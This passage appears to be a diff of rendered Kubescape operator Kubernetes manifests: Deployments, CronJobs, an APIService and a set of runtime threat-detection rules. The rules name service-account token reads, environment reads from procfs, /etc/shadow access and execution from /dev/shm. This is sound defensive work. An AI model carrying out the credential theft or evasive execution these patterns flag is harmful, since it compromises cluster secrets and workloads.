app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: kubevuln + image: quay.io/kubescape/kubevuln:v0.3.98 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - containerPort: 8080 + protocol: TCP + livenessProbe: + httpGet: + path: /v1/liveness + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /v1/readiness + port: 8080 + resources: + limits: + cpu: 1500m + ephemeral-storage: 10Gi + memory: 5000Mi + requests: + cpu: 300m + ephemeral-storage: 5Gi + memory: 1000Mi + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + - name: PRINT_POST_JSON + value: '' + - name: CA_MAX_VULN_SCAN_ROUTINES + value: '1' + args: + - -alsologtostderr + - -v=4 + - 2>&1 + volumeMounts: + - name: cloud-secret + mountPath: /etc/credentials + readOnly: true + - name: tmp-dir + mountPath: /tmp + - name: grype-db-cache + mountPath: /home/nonroot/anchore-resources/db + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: grype-db + mountPath: /home/nonroot/.cache/grype + volumes: + - name: cloud-secret + secret: + secretName: cloud-secret + - name: tmp-dir + emptyDir: {} + - name: grype-db-cache + emptyDir: {} + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: grype-db + emptyDir: {} + serviceAccountName: kubevuln + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + rollingUpdate: + maxSurge: 0% + maxUnavailable: 100% + type: RollingUpdate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + template: + metadata: + annotations: + checksum/operator-config: 4390a54f76466bfe8f7b90c12e53ada738e0cbc316cd132c17604a94c3b6d885 + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + checksum/capabilities-config: 6de901b4ead657e549bb9a6eef97eb55bbed2e0508a7a1875d2a48c9b29c0402 + checksum/matching-rules-config: 061617180b4f2780bd091c456b13a4b789654739862e082e4ad357c3ed226561 + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: operator + image: quay.io/kubescape/operator:v0.2.121 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - name: trigger-port + containerPort: 4002 + protocol: TCP + - name: readiness-port + containerPort: 8000 + protocol: TCP + - name: admission-port + containerPort: 8443 + protocol: TCP + livenessProbe: + httpGet: + path: /v1/liveness + port: readiness-port + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /v1/readiness + port: readiness-port + initialDelaySeconds: 10 + periodSeconds: 5 + resources: + limits: + cpu: 300m + memory: 300Mi + requests: + cpu: 50m + memory: 100Mi + env: + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: HELM_RELEASE + value: kubescape-operator-1.30.2 + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + volumeMounts: + - name: cloud-secret + mountPath: /etc/credentials + readOnly: true + - name: tmp-dir + mountPath: /tmp + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: ks-capabilities + mountPath: /etc/config/capabilities.json + readOnly: true + subPath: capabilities.json + - name: cs-matching-rules + mountPath: /etc/config/matchingRules.json + readOnly: true + subPath: matchingRules.json + - name: config + mountPath: /etc/config/config.json + readOnly: true + subPath: config.json + - name: tls-certs + mountPath: /etc/certs + readOnly: true + volumes: + - name: cloud-secret + secret: + secretName: cloud-secret + - name: tls-certs + secret: + secretName: kubescape-admission-webhook.honey.svc-kubescape-tls-pair + - name: tmp-dir + emptyDir: {} + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: ks-capabilities + configMap: + name: ks-capabilities + items: + - key: capabilities + path: capabilities.json + - name: config + configMap: + name: operator + items: + - key: config.json + path: config.json + - name: cs-matching-rules + configMap: + name: cs-matching-rules + items: + - key: matchingRules.json + path: matchingRules.json + serviceAccountName: operator + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: prometheus-exporter + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + type: Recreate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: prometheus-exporter + image: quay.io/kubescape/prometheus-exporter:v0.2.11 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - name: metrics + containerPort: 8080 + protocol: TCP + livenessProbe: + tcpSocket: + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + tcpSocket: + port: 8080 + resources: + limits: + cpu: 50m + memory: 100Mi + requests: + cpu: 10m + memory: 10Mi + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + volumeMounts: + - name: ks-cloud-config + mountPath: /etc/config + readOnly: true + volumes: + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + serviceAccountName: prometheus-exporter + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: storage + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + type: Recreate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + serviceAccountName: storage + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: apiserver + image: ghcr.io/k8sstormcenter/storage:dev-e64d59a + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + runAsNonRoot: true + livenessProbe: + httpGet: + path: /livez + port: 8443 + scheme: HTTPS + readinessProbe: + httpGet: + path: /readyz + port: 8443 + scheme: HTTPS + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + volumeMounts: + - name: data + mountPath: /data + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: config + mountPath: /etc/config/config.json + readOnly: true + subPath: config.json + - name: ca-certificates + mountPath: /etc/storage-ca-certificates + readOnly: true + resources: + limits: + cpu: 1500m + memory: 1500Mi + requests: + cpu: 100m + memory: 400Mi + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null + volumes: + - name: data + persistentVolumeClaim: + claimName: kubescape-storage + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: config + configMap: + name: storage + items: + - key: config.json + path: config.json + - name: ca-certificates + secret: + secretName: storage-ca +--- +apiVersion: batch/v1 +kind: CronJob +metadata: + name: kubescape-scheduler + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: kubescape-scan + kubescape.io/tier: core +spec: + schedule: 12 21 * * * + successfulJobsHistoryLimit: 3 + failedJobsHistoryLimit: 1 + jobTemplate: + spec: + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: kubescape-scan + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + containers: + - name: kubescape-scheduler + image: quay.io/kubescape/http-request:v0.2.16 + imagePullPolicy: IfNotPresent + resources: + limits: + cpu: 10m + memory: 20Mi + requests: + cpu: 1m + memory: 10Mi + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + runAsUser: 100 + args: + - -method=post + - -scheme=http + - -host=operator:4002 + - -path=v1/triggerAction + - -headers=Content-Type:application/json + - -path-body=/home/ks/request-body.json + volumeMounts: + - name: kubescape-scheduler + mountPath: /home/ks/request-body.json + subPath: request-body.json + readOnly: true + restartPolicy: Never + serviceAccountName: kubescape + automountServiceAccountToken: false + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null + volumes: + - name: kubescape-scheduler + configMap: + name: kubescape-scheduler +--- +apiVersion: batch/v1 +kind: CronJob +metadata: + name: kubevuln-scheduler + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: vuln-scan + kubescape.io/tier: core +spec: + schedule: 24 0 * * * + successfulJobsHistoryLimit: 3 + failedJobsHistoryLimit: 1 + jobTemplate: + spec: + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: vuln-scan + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + containers: + - name: kubevuln-scheduler + image: quay.io/kubescape/http-request:v0.2.16 + imagePullPolicy: IfNotPresent + resources: + limits: + cpu: 10m + memory: 20Mi + requests: + cpu: 1m + memory: 10Mi + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + runAsUser: 100 + args: + - -method=post + - -scheme=http + - -host=operator:4002 + - -path=v1/triggerAction + - -headers=Content-Type:application/json + - -path-body=/home/ks/request-body.json + volumeMounts: + - name: kubevuln-scheduler + mountPath: /home/ks/request-body.json + subPath: request-body.json + readOnly: true + restartPolicy: Never + serviceAccountName: kubevuln + automountServiceAccountToken: false + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null + volumes: + - name: kubevuln-scheduler + configMap: + name: kubevuln-scheduler +--- +apiVersion: apiregistration.k8s.io/v1 +kind: APIService +metadata: + name: v1beta1.spdx.softwarecomposition.kubescape.io + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + group: spdx.softwarecomposition.kubescape.io + groupPriorityMinimum: 1000 + versionPriority: 15 + version: v1beta1 + service: + name: storage + namespace: honey + caBundle: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURMRENDQWhTZ0F3SUJBZ0lSQUpiWTBacHczMnRPYkE3bkJOQVErcVl3RFFZSktvWklodmNOQVFFTEJRQXcKSURFZU1Cd0dBMVVFQXhNVmMzUnZjbUZuWlMwMFV6VkhVM0ZaVG1JNUxXTmhNQjRYRFRJMk1EUXlOVEEyTXpVeApPRm9YRFRJNE1EUXlOREEyTXpVeE9Gb3dJREVlTUJ3R0ExVUVBeE1WYzNSdmNtRm5aUzAwVXpWSFUzRlpUbUk1CkxXTmhNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTMyNnJ0T3ZnaUJqR3ZYZ0wKZWdXdFlTVUZ3M2tNL2tmL3kraWx6TWdwSUIvSnpIZG1jc2M1VVk0RUxYRTdYQllVb1FiL3ZJWmxnNWFNWmt1ZAovT2VncnN1VHVtRWNWRllienpleUtmL0wzSEM5SXZsQzN1d0FzREVyTENHaCs1TmdYc2dkdi9BYjVGNTg0Q21VCnlUUzl2aklFNTYrbmJWQVdnUTVYY3dRQ0xrTGFocitKck1yL0FoYzdRTVNLdXdnK0tOZlBWTWNSWmk3U2pqTXcKNXcvSllxR2k5N0h3a3NzbnZjcWRmb01NKzlCV0pxRndIdlFiaG1Ub2twbm13VVkzNTFEK3ZwZGZOaE5ObG5JeQoyQS9ocWVNOHg2WmYraW1mb2NnWTVtUWcwQkowQzVCTDgrN3BMN29kR2FxWmdkNXpKeTBLVFJPbktmdS96clJQClo4WjJZUUlEQVFBQm8yRXdYekFPQmdOVkhROEJBZjhFQkFNQ0FxUXdIUVlEVlIwbEJCWXdGQVlJS3dZQkJRVUgKQXdFR0NDc0dBUVVGQndNQ01BOEdBMVVkRXdFQi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZFcENZcU9aUXFUbgpOeGFCZDYwOEVTNGRoR3Y3TUEwR0NTcUdTSWIzRFFFQkN3VUFBNElCQVFBd29lRUQxOTZlWFZuay9IK3FDM0Z5CjJXSXJZNzRvVElhU3prYTd1UUd2RzlwOUcxdW5sZHdrUUFlckVjUWpHVDdwcmd1VlkxRlQ0ZUxuQzRSeVF2VG8KY3JGVUFPdTRCVEhsaXFmNGUveXBFWFhVbDltanVJK3hBSDJrUWdXOElpSXFVc1dSYmc2cEtqdCtaL25uVytWbQp5QkNHZzBBSFE3UmJBME5MTVJHOFArYkt4eDRwUlFDQlZHbndnbmk4VnVWVjNkTXYvMHdIbG8rRFRSd3d3eStNCnFOcE1BM0ROeURxQVhYK3Z6RlpKMk1oSlpGcDcvQTVTb3g2cVVKM1V1elpzcjZIeWs0dTA4cHdYMUltK01WbmYKaUd3R1lXT1BEQVl3Zkc3c04rbmZTUklCMUNxbXhHdnNxaktoeWRUbVkwVjFPaGtpbUZybEc4QmErMHQ3SHN3cgotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +--- +apiVersion: scheduling.k8s.io/v1 +kind: PriorityClass +metadata: + name: kubescape-critical + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-critical + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-critical + tier: ks-control-plane + kubescape.io/ignore: 'true' +value: 100000100.0 +globalDefault: false +description: This priority class is for node-agent daemonset pods +--- +apiVersion: kubescape.io/v1 +kind: Rules +metadata: + name: default-rules + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + rules: + - name: Unexpected process launched + enabled: true + id: R0001 + description: Detects unexpected process launches that are not in the baseline + expressions: + message: '''Unexpected process launched: '' + event.comm + '' with PID '' + + string(event.pid)' + uniqueId: event.comm + '_' + event.exepath + ruleExpression: + - eventType: exec + expression: '!ap.was_executed(event.containerId, parse.get_exec_path(event.args, + event.comm))' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - anomaly + - process + - exec + - applicationprofile + - name: Files Access Anomalies in container + enabled: false + id: R0002 + description: Detects unexpected file access that is not in the baseline + expressions: + message: '''Unexpected file access detected: '' + event.comm + '' with PID '' + + string(event.pid) + '' to '' + event.path' + uniqueId: event.comm + '_' + event.path + ruleExpression: + - eventType: open + expression: "(event.path.startsWith('/etc/') || event.path.startsWith('/var/log/')\ + \ || event.path.startsWith('/var/run/') || event.path.startsWith('/run/')\ + \ || event.path.startsWith('/var/spool/cron/') || event.path.startsWith('/var/www/')\ + \ || event.path.startsWith('/var/lib/') || event.path.startsWith('/opt/')\ + \ || event.path.startsWith('/usr/local/') || event.path.startsWith('/app/')\ + \ || event.path == '/.dockerenv' || event.path == '/proc/self/environ')\ + \ && !(event.path.startsWith('/run/secrets/kubernetes.io/serviceaccount')\ + \ ||\n event.path.startsWith('/var/run/secrets/kubernetes.io/serviceaccount')\ + \ ||\n event.path.startsWith('/tmp'))\n&& !ap.was_path_opened(event.containerId,\ + \ event.path)\n" + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0009 + mitreTechnique: T1005 + tags: + - anomaly + - file + - open + - applicationprofile + - name: Syscalls Anomalies in container + enabled: true + id: R0003 + description: Detects unexpected system calls that are not whitelisted by application + profile + expressions: + message: '''Unexpected system call detected: '' + event.syscallName + '' with + PID '' + string(event.pid)' + uniqueId: event.syscallName + ruleExpression: + - eventType: syscall + expression: '!ap.was_syscall_used(event.containerId, event.syscallName)' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - anomaly + - syscall + - applicationprofile + - name: Linux Capabilities Anomalies in container + enabled: true + id: R0004 + description: Detects unexpected capabilities that are not whitelisted by application + profile + expressions: + message: '''Unexpected capability used: '' + event.capName + '' in syscall '' + + event.syscallName + '' with PID '' + string(event.pid)' + uniqueId: event.comm + '_' + event.capName + ruleExpression: + - eventType: capabilities + expression: '!ap.was_capability_used(event.containerId, event.capName)' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - anomaly + - capabilities + - applicationprofile + - name: DNS Anomalies in container + enabled: true + id: R0005 + description: Detecting unexpected domain requests that are not whitelisted by + application profile. + expressions: + message: '''Unexpected domain communication: '' + event.name + '' from: '' + + event.containerName' + uniqueId: event.comm + '_' + event.name + ruleExpression: + - eventType: dns + expression: '!event.name.endsWith(''.svc.cluster.local.'') && !nn.is_domain_in_egress(event.containerId, + event.name)' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0011 + mitreTechnique: T1071.004 + tags: + - dns + - anomaly + - networkprofile + - name: Unexpected service account token access + enabled: true + id: R0006 + description: Detecting unexpected access to service account token. + expressions: + message: '''Unexpected access to service account token: '' + event.path + '' + with flags: '' + event.flags.join('','')' + uniqueId: event.comm + ruleExpression: + - eventType: open + expression: "((event.path.startsWith('/run/secrets/kubernetes.io/serviceaccount')\ + \ && event.path.endsWith('/token')) || \n (event.path.startsWith('/var/run/secrets/kubernetes.io/serviceaccount')\ + \ && event.path.endsWith('/token')) ||\n (event.path.startsWith('/run/secrets/eks.amazonaws.com/serviceaccount')\ + \ && event.path.endsWith('/token')) ||\n (event.path.startsWith('/var/run/secrets/eks.amazonaws.com/serviceaccount')\ + \ && event.path.endsWith('/token'))) &&\n!ap.was_path_opened_with_suffix(event.containerId,\ + \ '/token')\n" + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1528 + tags: + - anomaly + - serviceaccount + - applicationprofile + - name: Workload uses Kubernetes API unexpectedly + enabled: true + id: R0007 + description: Detecting execution of kubernetes client + expressions: + message: 'eventType == ''exec'' ? ''Kubernetes client ('' + event.comm + '') + was executed with PID '' + string(event.pid) : ''Network connection to Kubernetes + API server from container '' + event.containerName' + uniqueId: 'eventType == ''exec'' ? ''exec_'' + event.comm : ''network_'' + event.dstAddr' + ruleExpression: + - eventType: exec + expression: (event.comm == 'kubectl' || event.exepath.endsWith('/kubectl')) + && !ap.was_executed(event.containerId, parse.get_exec_path(event.args, event.comm)) + - eventType: network + expression: event.pktType == 'OUTGOING' && k8s.is_api_server_address(event.dstAddr) + && !nn.was_address_in_egress(event.containerId, event.dstAddr) + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0008 + mitreTechnique: T1210 + tags: + - exec + - network + - anomaly + - applicationprofile + - name: Read Environment Variables from procfs + enabled: true + id: R0008 + description: Detecting reading environment variables from procfs. + expressions: + message: '''Reading environment variables from procfs: '' + event.path + '' + by process '' + event.comm' + uniqueId: event.comm + '_' + event.path + ruleExpression: + - eventType: open + expression: 'event.path.startsWith(''/proc/'') && event.path.endsWith(''/environ'') + && !ap.was_path_opened_with_suffix(event.containerId, ''/environ'') + + ' + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1552.001 + tags: + - anomaly + - procfs + - environment + - applicationprofile + - name: eBPF Program Load + enabled: true + id: R0009 + description: Detecting eBPF program load. + expressions: + message: '''bpf program load system call (bpf) was called by process ('' + event.comm + + '') with command (BPF_PROG_LOAD)''' + uniqueId: event.comm + '_' + 'bpf' + '_' + string(event.cmd) + ruleExpression: + - eventType: bpf + expression: event.cmd == uint(5) && !ap.was_syscall_used(event.containerId, + 'bpf') + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1218 + tags: + - bpf + - ebpf + - applicationprofile + - name: Unexpected Sensitive File Access + enabled: true + id: R0010 + description: Detecting access to sensitive files. + expressions: + message: '''Unexpected sensitive file access: '' + event.path + '' by process + '' + event.comm' + uniqueId: event.comm + '_' + event.path + ruleExpression: + - eventType: open + expression: event.path.startsWith('/etc/shadow') && !ap.was_path_opened(event.containerId, + event.path) + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + tags: + - files + - anomaly + - applicationprofile + - name: Unexpected Egress Network Traffic + enabled: false + id: R0011 + description: Detecting unexpected egress network traffic that is not whitelisted + by application profile. + expressions: + message: '''Unexpected egress network communication to: '' + event.dstAddr + + '':'' + string(event.dstPort) + '' using '' + event.proto + '' from: '' + + event.containerName' + uniqueId: event.dstAddr + '_' + string(event.dstPort) + '_' + event.proto + ruleExpression: + - eventType: network + expression: event.pktType == 'OUTGOING' && !net.is_private_ip(event.dstAddr) + && !nn.was_address_in_egress(event.containerId, event.dstAddr) + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0010 + mitreTechnique: T1041 + tags: + - whitelisted + - network + - anomaly + - networkprofile + - name: Process executed from malicious source + enabled: true + id: R1000 + description: 'Detecting exec calls that are from malicious source like: /dev/shm' + expressions: + message: '''Execution from malicious source: '' + event.exepath + '' in directory + '' + event.cwd' + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + ruleExpression: + - eventType: exec + expression: '(event.exepath == ''/dev/shm'' || event.exepath.startsWith(''/dev/shm/'')) + || (event.cwd == ''/dev/shm'' || event.cwd.startsWith(''/dev/shm/'') || (parse.get_exec_path(event.args, + event.comm).startsWith(''/dev/shm/''))) + + ' + profileDependency: 2 + severity: 8 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - exec + - signature + - malicious + - name: Drifted process executed + enabled: true + id: R1001 + description: Detecting exec calls of binaries that are not included in the base + image + expressions: + message: '''Process ('' + event.comm + '') was executed and is not part of the + image''' + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + ruleExpression: + - eventType: exec + expression: "(event.upperlayer == true ||\n event.pupperlayer == true) &&\n\ + !ap.was_executed(event.containerId, parse.get_exec_path(event.args, event.comm))\n" + profileDependency: 1 + severity: 8 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1036 + tags: + - exec + - malicious + - binary + - base image + - applicationprofile + - name: Process tries to load a kernel module + enabled: true + id: R1002 + description: Detecting Kernel Module Load. + expressions: + message: '''Kernel module ('' + event.module + '') loading attempt with syscall + ('' + event.syscallName + '') was called by process ('' + event.comm + '')''' + uniqueId: event.comm + '_' + event.syscallName + '_' + event.module + ruleExpression: + - eventType: kmod + expression: event.syscallName == 'init_module' || event.syscallName == 'finit_module' + profileDependency: 2 + severity: 10 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1547.006 + tags: + - kmod + - kernel + - module + - load + - name: Disallowed ssh connection + enabled: false + id: R1003 + description: Detecting ssh connection to disallowed port + expressions: + message: '''Malicious SSH connection attempt to '' + event.dstIp + '':'' + string(dyn(event.dstPort))' + uniqueId: event.comm + '_' + event.dstIp + '_' + string(dyn(event.dstPort)) + ruleExpression: + - eventType: ssh + expression: dyn(event.srcPort) >= 32768 && dyn(event.srcPort) <= 60999 && + !(dyn(event.dstPort) in [22, 2022]) && !nn.was_address_in_egress(event.containerId, + event.dstIp) + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0008 + mitreTechnique: T1021.001 + tags: + - ssh + - connection + - port + - malicious + - networkprofile + - name: Process executed from mount + enabled: true + id: R1004 + description: Detecting exec calls from mounted paths. + expressions: + message: '''Process ('' + event.comm + '') was executed from a mounted path''' + uniqueId: event.comm + ruleExpression: + - eventType: exec + expression: '!ap.was_executed(event.containerId, parse.get_exec_path(event.args, + event.comm)) && k8s.get_container_mount_paths(event.namespace, event.podName, + event.containerName).exists(mount, event.exepath.startsWith(mount) || parse.get_exec_path(event.args, + event.comm).startsWith(mount))' + 